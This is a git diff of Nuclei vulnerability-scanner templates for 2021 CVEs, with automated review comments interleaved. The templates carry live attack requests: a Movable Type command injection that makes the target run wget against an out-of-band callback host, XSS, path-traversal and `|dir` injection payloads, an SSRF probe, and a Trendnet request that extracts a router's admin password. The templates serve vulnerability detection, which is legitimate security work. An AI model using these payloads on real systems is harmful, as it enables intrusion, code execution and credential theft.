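Review bot: The new `cpe: cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*` and `product: rv160_firmware` cover only one of the affected families, while the description lists RV16X, RV26X and RV34X and the `shodan-query` targets "Cisco rv340"; consumers filtering results by CPE will miss the RV260/RV340 cases. Either list the additional CPEs or add a comment such as `# cpe lists rv160_firmware only; RV26X/RV34X firmware is also affected per description`. The same narrowing appears in the CVE-2021-21087 hunk further down, where `cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*` is given although the description also names the 2018 and 2021 releases.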
@@ -68,5 +79,4 @@ requests: part: body words: - '"jsonrpc":' - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-1497.yaml b/nuclei-templates/CVE-2021/CVE-2021-1497.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-1497.yaml rename to nuclei-templates/CVE-2021/CVE-2021-1497.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20038.yaml b/nuclei-templates/CVE-2021/CVE-2021-20038.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20038.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20038.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20114.yaml b/nuclei-templates/CVE-2021/CVE-2021-20114.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20114.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20114.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20150.yaml b/nuclei-templates/CVE-2021/CVE-2021-20150.yaml new file mode 100644 index 0000000000..c0f5c920cf --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-20150.yaml 
@@ -0,0 +1,65 @@ +id: CVE-2021-20150 + +info: + name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure + author: gy741 + severity: medium + description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access to the router. + remediation: | + Update the router firmware to the latest version to fix the vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2021-54 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-20150 + cwe-id: CWE-306 + epss-score: 0.19434 + epss-percentile: 0.95837 + cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: trendnet + product: tew-827dru_firmware + shodan-query: http.html:"TEW-827DRU" + tags: cve2021,cve,disclosure,router,tenable,trendnet + +http: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ftp_username' + - 'ftp_password' + - 'ftp_permission' + - 'TEW-827DRU' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: password + group: 1 + regex: + - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />' + part: body +# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end 
of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20323.yaml b/nuclei-templates/CVE-2021/CVE-2021-20323.yaml index b83a77f07d..3f346d55d6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20323.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20323.yaml @@ -2,10 +2,14 @@ id: CVE-2021-20323 info: name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting - author: ndmalc + author: ndmalc,incogbyte severity: medium description: | Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher). reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 @@ -18,12 +22,18 @@ info: cvss-score: 6.1 cve-id: CVE-2021-20323 cwe-id: CWE-79 + epss-score: 0.00173 + epss-percentile: 0.53461 + cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 4 + vendor: redhat + product: keycloak shodan-query: html:"Keycloak" - verified: "true" - tags: cve,cve2021,keycloak,xss + tags: cve2021,cve,keycloak,xss,redhat -requests: +http: - method: POST path: - "{{BaseURL}}/auth/realms/master/clients-registrations/default" 
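Review bot: The `password` extractor in CVE-2021-20150.yaml is not `internal`, so the router's administrator password captured from `admin_passwd` is written verbatim into scan output; the four-word body matcher already proves the disclosure, so the extracted value adds little beyond exposing a live credential in results and logs. Consider `internal: true` (or removing the extractor) and, if the value is intentionally surfaced as proof, a comment such as `# extracts the admin password: scan output must be handled as a secret`. The raw POST also sends a form body with no `Content-Type` header, which may be fine for this device but is worth a line of justification.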
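Review bot: The new `remediation` in CVE-2021-20323.yaml says `Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher).`, which contradicts the template's own `name` and description stating that 10.0.0 through 18.0.0 are affected; following the advice as written leaves a vulnerable version in place. Replace the version with the fixed release from the linked GHSA advisory, e.g. `remediation: Upgrade Keycloak to <FIXED_VERSION from GHSA-m98g-63qj-fp8j> or later.`. The `impact` text presenting session hijacking and defacement also sits uneasily with the description's own statement that there is no common user-impacting exploitation path; hedging the impact wording would keep the two consistent.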
@@ -31,12 +41,12 @@ requests: - "{{BaseURL}}/realms/master/clients-registrations/default" - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" + body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}" + stop-at-first-match: true + headers: Content-Type: application/json - body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}" - - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -52,5 +62,4 @@ requests: - type: status status: - 400 - -# Enhanced by md on 2023/01/06 +# digest: 4a0a0047304502210094de0f55e8db0485dedb6be0b0faaa6737f8e5b40905c4c59b87598da6efa7c502203624957dc717497acf2a1ab8c0aee02060f4b9fc6fd22b24111abb850f2b07ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml index ab208a01bc..8433e63c9d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml 
@@ -1,42 +1,56 @@ id: CVE-2021-20837 info: - name: Movable Type XMLRPC API vulnerable to OS command injection - author: Min Won - description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - severity: high - tags: cve,cve2021,rce + name: MovableType - Remote Command Injection + author: dhiyaneshDK,hackergautam + severity: critical + description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. 
+ reference: + - https://nemesis.sh/posts/movable-type-0day/ + - https://github.com/ghost-nemesis/cve-2021-20837-poc + - https://twitter.com/cyber_advising/status/1454051725904580608 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20837 + cwe-id: CWE-78 + tags: cve,cve2021,rce,movable requests: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: POC - Accept: */* - Content-Length: 198 - Connection: close Content-Type: text/xml - + <?xml version="1.0" encoding="UTF-8"?> <methodCall> - <methodName>mt.handler_to_coderef</methodName> - <params> - <param> - <value> - <base64> - YGNhdCAvZXRjL3Bhc3N3ZGA= - </base64> - </value> - </param> - </params> + <methodName>mt.handler_to_coderef</methodName> + <params> + <param> + <value> + <base64> + {{base64("`wget http://{{interactsh-url}}`")}} + </base64> + </value> + </param> + </params> </methodCall> matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + words: + - "failed loading package" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21087.yaml b/nuclei-templates/CVE-2021/CVE-2021-21087.yaml index e93ec309db..d8102a7f67 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21087.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21087.yaml 
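Review bot: The rewritten `description` is garbled: `MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier` has lost the "Movable Type 7 r.5002 and earlier (Movable Type 7 Series)" and "Movable Type 6.8.2 and earlier (Movable Type 6 Series)" entries that the removed text carried, and `6.8. 2` contains a stray space. Restore the full product list, e.g. `Movable Type 7 r.5002 and earlier, Movable Type 6.8.2 and earlier, Movable Type Advanced 7 r.5002 and earlier, Movable Type Advanced 6.8.2 and earlier, Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands.` The template also keeps the legacy `requests:` key, has no `metadata`/`max-request`, and retains an `# Enhanced by` trailer where every other modified template in this commit gained a `# digest:` line, so it appears to be from an older upstream revision than its neighbours.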
@@ -1,23 +1,37 @@ id: CVE-2021-21087 info: - name: Adobe ColdFusion - Remote Code Execution + name: Adobe ColdFusion - Cross-Site Scripting author: Daviey severity: medium - description: Adobe ColdFusion is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability. reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21087 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-21087 cwe-id: CWE-79 + epss-score: 0.00186 + epss-percentile: 0.54967 + cpe: cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:* metadata: + max-request: 7 + vendor: adobe + product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: rce,adobe,misc,coldfusion + tags: cve2021,cve,xss,adobe,misc,coldfusion -requests: +http: - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js" 
@@ -29,9 +43,9 @@ requests: - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - 'eval\(\"\(\"\+json\+\"\)\"\)' @@ -39,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/10/10 +# digest: 4a0a00473045022100a8a85ba3feb3fc5625cd71d82087d10be42d642fd896fd5f96a35a9272ddff9402200a01ef82246294f6757e64c15356058aa6d3fc266364ca44ea705b2258a34ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21311.yaml b/nuclei-templates/CVE-2021/CVE-2021-21311.yaml new file mode 100644 index 0000000000..deec236dce --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21311.yaml 
@@ -0,0 +1,69 @@ +id: CVE-2021-21311 + +info: + name: Adminer <4.7.9 - Server-Side Request Forgery + author: Adam Crosser,pwnhxl + severity: high + description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. + remediation: Upgrade to version 4.7.9 or later. + reference: + - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 + - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf + - https://packagist.org/packages/vrana/adminer + - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 + - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2021-21311 + cwe-id: CWE-918 + epss-score: 0.01485 + epss-percentile: 0.85417 + cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* + metadata: + max-request: 6 + vendor: adminer + product: adminer + shodan-query: title:"Login - Adminer" + fofa-query: app="Adminer" && body="4.7.8" + hunter-query: app.name="Adminer"&&web.body="4.7.8" + tags: cve2021,cve,adminer,ssrf + +http: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} + + payloads: + path: + - "/index.php" + - "/adminer.php" + - "/adminer/adminer.php" + - "/adminer/index.php" + - "/_adminer.php" + - "/_adminer/index.php" + + attack: 
batteringram + stop-at-first-match: true + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>400 - Bad Request" + - "<title>400 - Bad Request</title>" + condition: or + + - type: status + status: + - 403 +# digest: 4a0a0047304502204671bff084169fc348f8c4837b6a81b74f49e87909f1e780a61bd35749ea8a16022100b98866077226246c174b2cb21ee40adccb717dcf57821c10b00a84b00c03df16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21345.yaml b/nuclei-templates/CVE-2021/CVE-2021-21345.yaml index b21c3a55cb..b56b65a5f9 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21345.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21345.yaml 
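Review bot: The body matcher lists `<title>400 - Bad Request` and `<title>400 - Bad Request</title>` with `condition: or`, but the first string is a prefix of the second, so the second word and the `condition` line are redundant; a single `- "<title>400 - Bad Request"` is equivalent. More importantly, detection depends on the target's outbound connection to `auth[server]=example.org` returning a page whose title contains that text, so a change on the third-party side produces silent false negatives and every scan makes the target contact an external host; a comment such as `# relies on example.org's 400 response being echoed back; not a direct proof of SSRF` would document that dependency. `max-request: 6` matches the six `path` payloads, which is good.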
@@ -6,21 +6,28 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 - remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. + - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 - cwe-id: CWE-78 - epss-score: 0.46618 - tags: cve,cve2021,xstream,deserialization,rce,oast + cwe-id: CWE-78,CWE-502 + epss-score: 0.4876 + epss-percentile: 0.9721 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve2021,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -100,3 +107,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4a0a00473045022100c57ea9d8cecf995608fe7d5b0128a9e6783b30e14e86bd3ba5820cc61fb13e5c02204144080c1e53f2cbea11cc5770c68b6014c15e5d0215a769eadff83ae34e16d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-21351.yaml b/nuclei-templates/CVE-2021/CVE-2021-21351.yaml index 23ba882fec..307176ac75 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21351.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21351.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 @@ -18,14 +20,14 @@ info: cvss-score: 9.1 cve-id: CVE-2021-21351 cwe-id: CWE-434 - epss-score: 0.77865 - epss-percentile: 0.97926 + epss-score: 0.73084 + epss-percentile: 0.98014 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2021,xstream,deserialization,rce,oast,vulhub + tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project http: - raw: @@ -131,4 +133,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402200f0d1166e2cddb880091408a91aed9caf6fb05640fd06b1629e2842f7ab9a8ce022014f8f72bd15bd1f23f94e91f1acd63412bc5e52f76ff30b984e867e46ffb7804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-21402.yaml b/nuclei-templates/CVE-2021/CVE-2021-21402.yaml deleted file mode 100644 index e1e590895c..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21402.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2021-21402 -info: - name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read - author: dwisiswant0 - severity: medium - description: | - Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when - Windows is used as the host OS. Servers that are exposed to the public Internet are - potentially at risk. This is fixed in version 10.7.1. - reference: - - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ - - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx - - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 - - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2021-21402 - cwe-id: CWE-22 - metadata: - fofa-query: title="Jellyfin" || body="http://jellyfin.media" - shodan-query: http.html:"Jellyfin" - verified: true - tags: cve,cve2021,jellyfin,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Content-Type: application/octet-stream" - part: header - - type: regex - regex: - - "\\[(font|extension|file)s\\]" - part: body diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml index 3c93d2ef05..44d996dca0 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml 
@@ -1,13 +1,13 @@ id: CVE-2021-21799 - info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting + name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting author: arafatansari severity: medium description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N @@ -18,26 +18,20 @@ info: shodan-query: http.html:"R-SeeNet" verified: "true" tags: cve,cve2021,xss,r-seenet - requests: - method: GET path: - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - matchers-condition: and matchers: - type: word part: body words: - "Telnet " - - type: word part: header words: - "text/html" - - type: status status: - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml b/nuclei-templates/CVE-2021/CVE-2021-21800.yaml deleted file mode 100644 index ad5eb3b23d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml +++ /dev/null 
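Review bot: The new description introduces a spelling error, `Refleced`, and replaces the more precise removed wording with a looser one; the same hunk also re-adds the cve.mitre.org link already covered by the NVD reference. If the wording change is intentional, at least fix the typo: `Advantech R-SeeNet v 2.4.12 is vulnerable to Reflected Cross Site Scripting in the telnet_form.php script functionality.`. The second hunk only strips blank lines and the `# Enhanced by` trailer, which reads as a revert to an older revision rather than an update; other templates in this commit replace that trailer with a `# digest:` line, so this one now has neither.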
@@ -1,43 +0,0 @@ -id: CVE-2021-21800 - -info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21800 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21800 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SSH Session " - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21801.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21801.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml index 06e9b12621..28e27e9668 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml 
@@ -1,15 +1,23 @@ id: CVE-2021-21802 + info: name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) author: gy741 severity: medium description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - tags: cve,cve2021,r-seenet,xss + tags: cve,cve2021,rseenet,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21802 + cwe-id: CWE-79 + requests: - method: GET path: - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' + matchers-condition: and matchers: - type: word @@ -18,10 +26,12 @@ requests: - 'Device Status Graph' part: body condition: and + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21803.yaml b/nuclei-templates/CVE-2021/CVE-2021-21803.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21803.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21803.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml index 3ed6b9fc39..46e88b33e8 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml 
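Review bot: The tag rename `r-seenet` → `rseenet` makes this template inconsistent with the sibling R-SeeNet templates in this same commit (CVE-2021-21799 and CVE-2021-21805 keep `r-seenet`), so a `-tags r-seenet` run would no longer select it; `tags: cve,cve2021,r-seenet,xss` keeps the set coherent. The added `cvss-score: 6.10` also departs from the one-decimal form used elsewhere in the repository (`cvss-score: 6.1`), and the new `classification` block lacks the `cwe-id`-matching `reference` list format (the `reference` value here is a bare scalar, not a list), which is worth normalising while the block is being touched. The second hunk only adds blank lines between matchers.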
@@ -1,42 +1,27 @@ id: CVE-2021-21805 - info: - name: Advantech R-SeeNet 2.4.12 - OS Command Injection + name: Advantech R-SeeNet v 2.4.12 - OS Command Injection author: arafatansari severity: critical description: | - Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - impact: | - Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. - remediation: | - Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. + Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 - epss-score: 0.97374 - epss-percentile: 0.99895 - cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: advantech - product: r-seenet shodan-query: http.html:"R-SeeNet" - tags: cve2021,cve,rce,r-seenet,advantech - -http: + verified: "true" + tags: cve,cve2021,rce,r-seenet +requests: - method: GET path: - "{{BaseURL}}/php/ping.php?hostname=|dir" - matchers-condition: and matchers: - type: word 
